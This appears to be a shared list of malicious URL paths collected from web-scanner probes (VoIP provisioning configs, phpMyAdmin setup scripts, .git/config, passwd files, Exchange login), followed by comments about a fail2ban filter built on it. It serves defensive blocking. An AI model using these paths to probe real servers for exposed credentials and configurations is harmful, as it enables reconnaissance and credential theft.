/WebItemsLevel.cfg
/yealink/Talking.xml
/autoprpvisioning/Talking.xml
/autoprpvision/Talking.xml
/autoprpv/Talking.xml
/autoprovisioning/Talking.xml
/autoprovision/Talking.xml
/autoprov/Talking.xml
/phones/Talking.xml
/phone/Talking.xml
/configs/Talking.xml
/config/Talking.xml
/conf/Talking.xml
/cfg/Talking.xml
/provisioning/Talking.xml
/provision/Talking.xml
/prov/Talking.xml
/pv/Talking.xml
/p/Talking.xml
/Talking.xml
/yealink/Autodst.xml
/autoprpvisioning/Autodst.xml
/autoprpvision/Autodst.xml
/autoprpv/Autodst.xml
/autoprovisioning/Autodst.xml
/autoprovision/Autodst.xml
/autoprov/Autodst.xml
/phones/Autodst.xml
/phone/Autodst.xml
/configs/Autodst.xml
/config/Autodst.xml
/conf/Autodst.xml
/cfg/Autodst.xml
/provisioning/Autodst.xml
/provision/Autodst.xml
/prov/Autodst.xml
/pv/Autodst.xml
/p/Autodst.xml
/Autodst.xml
/polycom/polycom/000000000000.cfg
/autoprpvisioning/polycom/000000000000.cfg
/autoprpvision/polycom/000000000000.cfg
/autoprpv/polycom/000000000000.cfg
/autoprovisioning/polycom/000000000000.cfg
/autoprovision/polycom/000000000000.cfg
/autoprov/polycom/000000000000.cfg
/websql/scripts/setup.php
/web/phpMyAdmin/scripts/setup.php
/php-my-admin/scripts/setup.php
/db/scripts/setup.php
/admin/phpmyadmin/scripts/setup.php
/dbadmin/scripts/setup.php
/mysqladmin/scripts/setup.php
/MyAdmin/scripts/setup.php
/pma/scripts/setup.php
/w00tw00t.at.blackhats.romanian.anti-sec:)
/nmaplowercheck1549180491
/phones/polycom/000000000000.cfg
/phone/polycom/000000000000.cfg
/configs/polycom/000000000000.cfg
/config/polycom/000000000000.cfg
/conf/polycom/000000000000.cfg
/cfg/polycom/000000000000.cfg
/provisioning/polycom/000000000000.cfg
/provision/polycom/000000000000.cfg
/prov/polycom/000000000000.cfg
/pv/polycom/000000000000.cfg
/p/polycom/000000000000.cfg
/polycom/000000000000.cfg
/autoprpvisioning/000000000000.cfg
/autoprpvision/000000000000.cfg
/autoprpv/000000000000.cfg
/autoprovisioning/000000000000.cfg
/autoprovision/000000000000.cfg
/autoprov/000000000000.cfg
/phones/000000000000.cfg
/phone/000000000000.cfg
/configs/000000000000.cfg
/config/000000000000.cfg
/conf/000000000000.cfg
/provisioning/000000000000.cfg
/provision/000000000000.cfg
/prov/000000000000.cfg
/pv/000000000000.cfg
/p/000000000000.cfg
/aastra/aastra.cfg
/Consolidacion/ArchivosPorPublicacion
/SIPCfg/
/user/
/downloader/
/manager/
/wp/
/admin/content/sitetree/
/simpla/
/configServlet/
/avaya/
/desktopphone/
/deskphone/aastra/
/pbx/
/t32/
/dekstop/phone/
/Htek/
/Obihai/
/sangoma/
/typo3/
/polycom-vvx/
/ucs/
/fpbx/
/Denwa/
/ata/
/tiptel/
/txt/
/inetpub/
/deskphone/
/admin/index.php/dms/Cisco-SPA-122/
/netgen/
/trixbox/
/BizTouch/
/sys/
/gxp_1165/
/FreeSwitch/
/dms/
/overrides/
/getconf/
/voip/
/scottch/
/asterisk/phoneprov/
/voip_provisioning/
/unauthenticated/provisioning/
/provisioning/p.php/
/app/provision/
/sip/
/xmlservices/
/mitel/
/siemens/
/panasonic/
/grandstream/
/Alcatel/
/Gigaset/
/digium/
/audiocodes/
/broadsoft/
/sipura/
/cisco/
/linksys/
/pap2/
/spa/
/polycom/
/Snom/
/yealink/
/aastra/
/folder/
/users/
/management/
/phones/
/phone/
/config_server/
/phoneprov/
/provisioning/
/provision/
/phprov/
/prov/
/cfg/
/xml/
/tftpphone/
/tftproot/
/tftpboot/
/tftp/
/ftp/
/devicecfg/
/device/
/firmware/
/gif/style.css
//.git/config
/menu.js
/webmail/imp/test.php
/SQLite/SQLiteManager-1.2.4/main.php
/phpMyAdmin
/Joomla/administrator
/cms/administrator
/status?full=true
/cms/
/drupal/
/rss/catalog/notifystock/
/user/login
/webinars.html
/phpMyAdmin3/scripts/setup.php
/phpMyAdmin-2.8.9/scripts/setup.php
/phpMyAdmin-2.7.5/scripts/setup.php
/phpMyAdmin-2.6.1-pl3/scripts/setup.php
/phpMyAdmin-2.6.1-pl2/scripts/setup.php
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php
/phpMyAdmin-2.9.0/scripts/setup.php
/phpMyAdmin-2.10.0.2/scripts/setup.php
/phpMyAdmin-2.10.0.1/scripts/setup.php
/phpMyAdmin-2.10.0.0/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
/_phpMyAdmin/scripts/setup.php
/phpadmin/scripts/setup.php
/cpanelphpmyadmin/scripts/setup.php
/cpadmindb/scripts/setup.php
/my/scripts/setup.php
/phpMyAdmin2/scripts/setup.php
/sqladm/scripts/setup.php
/cpadmin/scripts/setup.php
/sqladmin/scripts/setup.php
/admin/scripts/setup.php
/mysql/scripts/setup.php
/topics1.html
/wordpress/
/blog/robots.txt
/our-philosophy.html
/current_config/passwd
/device_description.xml
/login.html
/winbox.png
/currentsetting.htm
/fdsrwe
/images/logo.gif
/home.asp
/owa/auth/logon.aspx

This is great, thanks!

Would you mind sharing the unique URL filter?

@tommytakedown, here it is
https://github.com/acosonic/fail2ban_custom_rules

This is great, thanks!

Would you mind sharing the unique URL filter?

If you are interested in IT security, the real one, not the fake product-selling one :) you can read some of my LinkedIN articles

https://www.linkedin.com/pulse/preventing-mail-server-brute-force-attacks-from-ukrainian-pavic/

I don't know if you are interested in updates. But here's one we caught: /owa/auth/logon.aspx

/owa/auth/logon.aspx

Thank's that's attempt to brute-force Microsoft Exchange's on-premises login... I'll add it.

:-)

/owa/auth/logon.aspx

Thank's that's attempt to brute-force Microsoft Exchange's on-premises login... I'll add it.